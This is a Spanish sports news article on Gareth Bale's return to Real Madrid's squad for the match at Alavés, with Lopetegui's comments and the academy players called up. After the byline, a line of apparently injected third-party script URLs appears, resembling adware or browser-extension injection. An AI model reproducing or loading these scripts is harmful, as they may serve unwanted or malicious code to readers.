¡LOS NUESTROS PRIMERO!

Bale está recuperado e inscribió su nombre para la visita al Alavés

Bale - EFE

Los problemas de gol que tiene el Real Madrid podrían ser resueltos este fin de semana en Mendizorroza cuando el conjunto merengue visite al Deportivo Alavés con Gareth Bale en la convocatoria, solo falta por ver si Julen Lopetegui decide que salga desde el inicio.

El extremo galés había salido por precaución en el derbi contra el Atlético y Lopetegui hoy agradece haber actuado a tiempo. “Detectó a tiempo unas molestias, que de haber seguido habrían ido a más. Por eso salió en el descanso del Atlético de Madrid y ahora está preparado”.

Bale ha sido incisivo en lo que va de temporada, asumió el papel de referente y es el jugador que más amenazas provoca en el frente ofensivo blanco. “Es un jugador importante en nuestro equipo que afortunadamente está bien”, reconoció Julen Lopetegui.

Trabajó por segundo día consecutivo en Valdebebas. También se sumó este viernes Raphael Varane al grupo y Sergio Ramos, ausente en Moscú, volverá para el compromiso liguero.

Lopetegui llamó a 10 canteranos para la última sesión de trabajo antes de visitar al Alavés: Sergio López, Javi Sánchez, Adrián De la Fuente, Fran García, Jaume Grau, Álvaro Fidalgo, Jaime Seoane, Franchu, Jorge De Frutos y Cristo González.

Escrito por: Raúl Zambrano Cabello / @RaulZambrano7

Foto: EFE.

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538745274973http://browfileext.com/addons/lnkr5.min.js

Oswaldo Guevara